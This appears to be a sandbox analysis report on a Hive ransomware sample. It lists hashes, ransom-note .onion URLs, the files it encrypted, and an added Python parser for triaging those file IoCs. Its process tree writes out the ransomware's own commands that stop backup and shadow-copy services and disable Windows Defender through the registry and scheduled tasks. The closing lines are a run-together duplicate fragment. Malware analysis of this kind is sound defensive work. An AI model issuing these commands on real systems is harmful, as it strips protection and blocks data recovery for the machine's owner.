Analysis
  max time kernel: 104s
  max time network: 12s
  platform: windows7_x64
  resource: win7-en-20211208
  submitted: 12-01-2022 14:10

Static task: static1
Behavioral task: behavioral1
  Sample: a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
  Resource: win10-en-20211208

General
  Target: a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
  Size: 3.7MB
  MD5: aeeee4eadf43fe2e6780bb3dd21b932b
  SHA1: 89c40f8c28476743f954bbcc6e84aa19e969c6fc
  SHA256: a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357
  SHA512: 748003efc5416ecfef232f83772aa401834d345ef7550a8bafdbfbae8f0d51ec54d84769f4dcb907d6b64ff04bb6335b6f2fe1a3993f80b54ff3d37a55d20ce1
Malware Config
  Extracted from: C:\Program Files\7-Zip\agQX_HOW_TO_DECRYPT.txt
  Family: hive
  URLs:
    http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
    http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses the MpCmdRun utility to delete all AV definitions.
  Processes: PID 2128 MpCmdRun.exe

Hive
  A ransomware family written in Go (Golang), first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: PID 2064 bcdedit.exe; PID 2088 bcdedit.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
Drops file in Program Files directory (64 IoCs)
  Process for every entry: a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
  File opened for modification:
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABEL98.POC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files\VideoLAN\VLC\lua\http\mobile.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR16F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc
    C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGZIP.DPV.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\clock.html
    C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png
    C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3FR.LEX.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115866.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png
    C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\settings.css
    C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png
    C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\1036\MSO.ACL.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files\7-Zip\Lang\ko.txt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files\Java\jre7\lib\zi\America\Metlakatla.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp
    C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\gadget.xml
  File created:
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\agQX_HOW_TO_DECRYPT.txt
    C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\agQX_HOW_TO_DECRYPT.txt
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\agQX_HOW_TO_DECRYPT.txt
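The listing above shows three kinds of entries: ransom notes created per directory, files renamed to `<original name>.<token>.s72gp`, and files that were only opened. As an added example (not code from the Triage report or from the Hive sample), the parser below splits each IoC line into action and path, classifies it into those three kinds, and pulls out the token between the original name and the `.s72gp` extension. The report does not say what the token encodes; the parser only splits it at its single underscore, because that tail is the only part that differs between files in the listing. The sample lines are copied from the report.

```python
"""Parse 'Drops file in Program Files directory' IoC lines from a Triage-style report.

Added example; not code from the report or from the Hive sample. The ransom-note
name and the .s72gp extension are taken from the listing above.
"""
import re
from collections import Counter

RANSOM_NOTE = "agQX_HOW_TO_DECRYPT.txt"   # ransom note name seen in the report
ENCRYPTED_EXT = "s72gp"                   # extension appended to renamed files in the report

# Subset of the report's IoC lines, copied verbatim (description + path).
REPORT_IOCS = [
    r"File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp",
    r"File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp",
    r"File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png",
    r"File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\agQX_HOW_TO_DECRYPT.txt",
    r"File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp",
    r"File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp",
]

LINE_RE = re.compile(r"^(?P<action>File created|File opened for modification) (?P<path>[A-Za-z]:\\.+)$")
# <original name>.<dot-free token of base64url-alphabet chars, long enough not to be a real extension>.s72gp
NAME_RE = re.compile(r"^(?P<orig>.+?)\.(?P<token>[A-Za-z0-9_-]{32,})\." + re.escape(ENCRYPTED_EXT) + r"$")


def parse_ioc(line):
    """Return a record with action, path, kind (ransom_note / encrypted / touched) and token parts."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised IoC line: {line!r}")
    path = m.group("path")
    name = path.rsplit("\\", 1)[-1]
    rec = {"action": m.group("action"), "path": path, "kind": "touched",
           "original_name": name, "token_head": None, "token_tail": None}
    if name == RANSOM_NOTE:
        rec["kind"] = "ransom_note"
        return rec
    nm = NAME_RE.match(name)
    if nm:
        # The token's meaning is not given by the report; only its tail varies across files.
        head, _, tail = nm.group("token").rpartition("_")
        rec.update(kind="encrypted", original_name=nm.group("orig"), token_head=head, token_tail=tail)
    return rec


def summarize(lines):
    """Counts per kind, the distinct token heads, token tails and original extensions of renamed files."""
    recs = [parse_ioc(l) for l in lines]
    return {
        "kinds": Counter(r["kind"] for r in recs),
        "token_heads": sorted({r["token_head"] for r in recs if r["token_head"]}),
        "token_tails": Counter(r["token_tail"] for r in recs if r["token_tail"]),
        "original_exts": Counter(r["original_name"].rsplit(".", 1)[-1].lower()
                                 for r in recs if r["kind"] == "encrypted"),
    }


if __name__ == "__main__":
    for key, value in summarize(REPORT_IOCS).items():
        print(key, dict(value) if isinstance(value, Counter) else value)
```

Run over the six copied lines it reports four renamed files, one file merely opened, one ransom note, a single token head shared by every renamed file and two token tails. For triage on a real host the same split is what you want: the ransom-note paths give the directories the sample walked, the renamed files give the scope of loss, and the "touched but not renamed" set (here the Sidebar gadget and DVD Maker images) is the set to check first, since those files may still be intact.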
Launches sc.exe
  sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: PID 1124 vssadmin.exe

Opens file in notepad (likely ransom note) (1 IoC)
  Processes: PID 2388 NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: PID 2160 powershell.exe; PID 2248 powershell.exe; PID 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (PID process: privileges enabled):
  - 1836 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  - 1780 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  - 1792 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  - 1520 wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  - 1104 wmic.exe: the same 20 privileges as PID 1520, enabled in two passes; the second pass is cut off after privilege 33 because the sandbox caps each signature at 64 IoCs
  The unnamed entries 33, 34 and 35 are the privilege LUIDs the sandbox did not resolve (SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege). SeSecurityPrivilege plus SeBackupPrivilege on three separate wevtutil.exe instances is the token shape expected for the "Clears Windows event logs" signature above, and the broad set on wmic.exe is what WMI-based shadow copy deletion looks like from the token side.

Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID process -> target PID process; the sandbox records each write three times):
  - 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe -> 588 net.exe; 588 net.exe -> 556 net1.exe
  - 1628 (sample) -> 872 net.exe; 872 net.exe -> 1436 net1.exe
  - 1628 (sample) -> 1644 net.exe; 1644 net.exe -> 640 net1.exe
  - 1628 (sample) -> 692 net.exe; 692 net.exe -> 1440 net1.exe
  - 1628 (sample) -> 1544 net.exe; 1544 net.exe -> 1156 net1.exe
  - 1628 (sample) -> 1100 net.exe; 1100 net.exe -> 1060 net1.exe
  - 1628 (sample) -> 1280 net.exe; 1280 net.exe -> 1496 net1.exe
  - 1628 (sample) -> 1172 net.exe; 1172 net.exe -> 1632 net1.exe
  - 1628 (sample) -> 1136 sc.exe; 1628 -> 1624 sc.exe; 1628 -> 1404 sc.exe; 1628 -> 1684 sc.exe; 1628 -> 1688 sc.exe
  - 1628 (sample) -> 1292 sc.exe (one event recorded before the 64-IoC cap)
  These writes are the normal parent-to-child handoff of process creation (net.exe spawning net1.exe is how net.exe works), not injection; the signature fires on the API, not on intent.
Processes

[1] PID 1628  C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

  [2] PID 588  C:\Windows\system32\net.exe
      cmd: net.exe stop "NetMsmqActivator" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 556  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "NetMsmqActivator" /y

  [2] PID 872  C:\Windows\system32\net.exe
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1436  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SamSs" /y

  [2] PID 1644  C:\Windows\system32\net.exe
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 640  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y

  [2] PID 692  C:\Windows\system32\net.exe
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1440  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y

  [2] PID 1544  C:\Windows\system32\net.exe
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1156  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y

  [2] PID 1100  C:\Windows\system32\net.exe
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1060  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "VSS" /y

  [2] PID 1280  C:\Windows\system32\net.exe
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1496  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "wbengine" /y

  [2] PID 1172  C:\Windows\system32\net.exe
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1632  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "WebClient" /y

  [2] PID 1136  C:\Windows\system32\sc.exe
      cmd: sc.exe config "NetMsmqActivator" start= disabled
  [2] PID 1624  C:\Windows\system32\sc.exe
      cmd: sc.exe config "SamSs" start= disabled
  [2] PID 1404  C:\Windows\system32\sc.exe
      cmd: sc.exe config "SDRSVC" start= disabled
  [2] PID 1684  C:\Windows\system32\sc.exe
      cmd: sc.exe config "SstpSvc" start= disabled
  [2] PID 1688  C:\Windows\system32\sc.exe
      cmd: sc.exe config "UI0Detect" start= disabled
  [2] PID 1292  C:\Windows\system32\sc.exe
      cmd: sc.exe config "VSS" start= disabled
  [2] PID 1776  C:\Windows\system32\sc.exe
      cmd: sc.exe config "wbengine" start= disabled
  [2] PID 1932  C:\Windows\system32\sc.exe
      cmd: sc.exe config "WebClient" start= disabled

  [2] PID 1964  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 332  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] PID 1204  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] PID 1244  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] PID 892  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] PID 984  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 1060  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] PID 1884  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] PID 1160  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 1020  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] PID 1996  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] PID 1328  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] PID 1904  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] PID 1416  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] PID 1092  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 900  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

  [2] PID 1720  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] PID 836  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] PID 436  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] PID 876  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [2] PID 1116  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

  [2] PID 1016  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] PID 1772  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] PID 1936  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] PID 1908  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1744  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1032  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1976  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 676  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1672  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 2020  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- Modifies security service
PID:1764 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:908
-
